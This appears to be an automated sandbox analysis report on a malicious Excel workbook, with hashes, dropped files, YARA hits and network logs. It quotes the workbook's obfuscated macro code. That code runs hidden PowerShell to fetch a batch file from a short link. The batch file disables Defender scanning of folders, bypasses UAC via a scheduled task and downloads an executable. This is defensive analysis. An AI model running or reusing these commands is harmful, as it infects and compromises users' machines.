                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLLWWEN87DPEWAHB9XA5.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\cr.exe
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                        Category:dropped
                                                        Size (bytes):565248
                                                        Entropy (8bit):7.234649741813346
                                                        Encrypted:false
                                                        SSDEEP:12288:4olpZq/qtrvH5GxZ8cyGdGYa3JbD/ON/5Eg:4orZq/q9CYG8YAJbDmN
                                                        MD5:740E559929463320CB8E0403FD35A097
                                                        SHA1:CFE5A0BF2D21B6C36930DCC942849086DDEC9134
                                                        SHA-256:BAB37B37285FABDDA77B8C7EEA78B97EE1EF087DF7ECA796E3D49C4205DE6BD1
                                                        SHA-512:D56B448064828AEEC98536CAA9F3264327871FABA16D8B8FAD48D9C2781C994D93C2A85DE1C3EDAEC5EC736671673FFFF24D46C8070B960FED9A5958DD9C6501
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 72%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e*...y...y...y..y..y..y..y..y...y.rpy...y...y...y..y...y..y...y..y...yRich...y................PE..L......^.................0........7..6?...7...@...@...........................@..............................................q@.`.....@..q..................................................T8?.......?.H...........................................UPX0......7.............................UPX1.....0....7..(..................@....rsrc.........@..t...,..............@......................................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                        C:\Users\user\Desktop\251F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Category:dropped
                                                        Size (bytes):297703
                                                        Entropy (8bit):7.748820416386462
                                                        Encrypted:false
                                                        SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2Nd00PRkbE4ASEg7R6aNeMs64oYiyJT4JQIMWg:nn9ASKaNeEYLTfIM3
                                                        MD5:62B4022B1E29913ECFA4F5D47807C60E
                                                        SHA1:EAEF7910733990E9D863040550E459D2EEAE7943
                                                        SHA-256:1BF64FCE96A41E7121C1A12698171DDFED3FE227941AA61E69F378C3AF405587
                                                        SHA-512:90C980B3A9FB4045A5951506BF9350D7861FFEF5203EEDFDA1751B840994D5BFE30DE9BC8597B028F07B9C101D2EAA99AFD0008AAC595A37A212712B36AC8974
                                                        Malicious:false
                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                        C:\Users\user\Documents\pd.bat
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):2000
                                                        Entropy (8bit):5.3585901083999214
                                                        Encrypted:false
                                                        SSDEEP:48:dnjA3VfSfC/7vUVfSfC/7vQVfSfC/7vu1AQ:dnM30K/Q0K/k0K/sAQ
                                                        MD5:C771FD125198A4C0339E354183CD48A9
                                                        SHA1:47399A8E8FC4FE8A41703A587EC26C2837C6BA3A
                                                        SHA-256:9B46B9922BE2E0A9CDEE75F02F86C6CA9ECA965A2CA84EAAB8A997A2BC11E768
                                                        SHA-512:5BBA903C99973959CD090AB1483F66AA2B13823F180E26C369892996A6163E6E28BC4623C1CCE095ED6D3A944F384A84058313B2DC847B2EE92B9185C797C2FC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                        • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                        Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2;

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                        Entropy (8bit):7.822763112772762
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:ul9kpUwYel.xls
                                                        File size:281600
                                                        MD5:c2ca4d5f2632597023b6cf5b496fb4ed
                                                        SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
                                                        SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
                                                        SHA512:67c000984f8811626fcebb522b21399a29bc51fbddae108c08af6760cf57720ffc87eb4fdb448cfe4a8d0f355e30a46f804619dfb7cccadcbfae9a3e1339c4ca
                                                        SSDEEP:6144:fnSGiysRchNXHfA1MiWhZFVEld+Dr7EU/RdbM4oSEIbWyaNekMiYg4iyJTQJQgTH:2WloSVaNeM4rT3gTH
                                                        File Content Preview:........................;...................................#..................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4eea286a4b4bcb4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "ul9kpUwYel.xls"

                                                        Indicators

                                                        Has Summary Info:True
                                                        Application Name:unknown
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:True

                                                        Summary

                                                        Code Page:1252
                                                        Last Saved By:blobijump
                                                        Create Time:2020-09-20 21:17:44
                                                        Last Saved Time:2021-01-03 23:14:32
                                                        Security:1

                                                        Document Summary

                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:1048576

                                                        Streams

                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        File Type:data
                                                        Stream Size:276
                                                        Entropy:3.16930549839
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        File Type:data
                                                        Stream Size:156
                                                        Entropy:3.29938329109
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 276911
                                                        General
                                                        Stream Path:Workbook
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:276911
                                                        Entropy:7.85404453629
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                        Macro 4.0 Code

                                                        ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/ZjsbPXY','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 8, 2021 09:06:06.970048904 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.010096073 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.010205030 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.033577919 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.073527098 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078279972 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078305006 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078320026 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.078397036 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.085994005 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:07.126003981 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.126857042 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:07.329070091 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.254014015 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.293910980 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354618073 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354665995 CET44349165104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:11.354723930 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:11.358566046 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.405617952 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.405689001 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.405921936 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.458991051 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.459027052 CET804916737.46.150.139192.168.2.22
                                                        Jan 8, 2021 09:06:11.459093094 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.517374039 CET4916780192.168.2.2237.46.150.139
                                                        Jan 8, 2021 09:06:11.517652035 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.680576086 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.720607042 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.720712900 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.726763010 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.766719103 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773158073 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773205042 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773220062 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773267984 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.785875082 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.825841904 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.826107979 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.030057907 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.143624067 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.183582067 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304924011 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304955006 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.305063009 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.494285107 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652462006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.652621984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652738094 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.810796976 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814476967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814513922 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814532995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814549923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814613104 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815541029 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815577984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815602064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815601110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815625906 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815650940 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815670967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815684080 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815701008 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815721989 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972599983 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972642899 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972662926 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972685099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972733974 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972889900 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973469973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973501921 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973524094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973550081 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973556042 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973567963 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973591089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973613977 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973625898 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973632097 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973656893 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973673105 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973685026 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973690033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973711967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973731041 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973735094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973752975 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973777056 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973835945 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.130754948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130800009 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130827904 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130851984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130876064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130898952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131103039 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131129980 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131153107 CET8049169192.185.194.191192.168.2.22

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 8, 2021 09:06:06.904562950 CET5219753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:06.952363014 CET53521978.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:07.894315004 CET5309953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:07.952980995 CET53530998.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:07.957093954 CET5283853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:08.004982948 CET53528388.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:18.620414019 CET6120053192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:18.668276072 CET53612008.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:19.309438944 CET4954853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:19.493421078 CET53495488.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:24.867347002 CET5562753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:24.923634052 CET53556278.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:24.946413994 CET5600953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:25.002636909 CET53560098.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:51.222317934 CET6186553192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:51.282998085 CET53618658.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:06:51.323060036 CET5517153192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:06:51.382138014 CET53551718.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:17.531116009 CET5249653192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:17.591433048 CET53524968.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:17.611469030 CET5756453192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:17.659508944 CET53575648.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:43.751187086 CET6300953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:43.810369015 CET53630098.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:07:43.828711987 CET5931953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:07:43.890265942 CET53593198.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:09.986008883 CET5307053192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:10.042922974 CET53530708.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:10.055391073 CET5977053192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:10.112701893 CET53597708.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.010469913 CET6152353192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.058412075 CET53615238.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.073539972 CET6279153192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.121582031 CET53627918.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.778194904 CET5066753192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.847470999 CET53506678.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:11.870695114 CET5412953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:11.934531927 CET53541298.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:26.348934889 CET6532953192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:26.409410000 CET53653298.8.8.8192.168.2.22
                                                        Jan 8, 2021 09:08:26.413012981 CET6071853192.168.2.228.8.8.8
                                                        Jan 8, 2021 09:08:26.469329119 CET53607188.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jan 8, 2021 09:06:06.904562950 CET192.168.2.228.8.8.80xd78fStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:18.620414019 CET192.168.2.228.8.8.80x1192Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:19.309438944 CET192.168.2.228.8.8.80x4317Standard query (0)chebo.discountmonumentcenter.comA (IP address)IN (0x0001)
                                                        Jan 8, 2021 09:06:24.867347002 CET192.168.2.228.8.8.80xefb6Standard query (0)telete.inA (IP address)IN (0x0001)
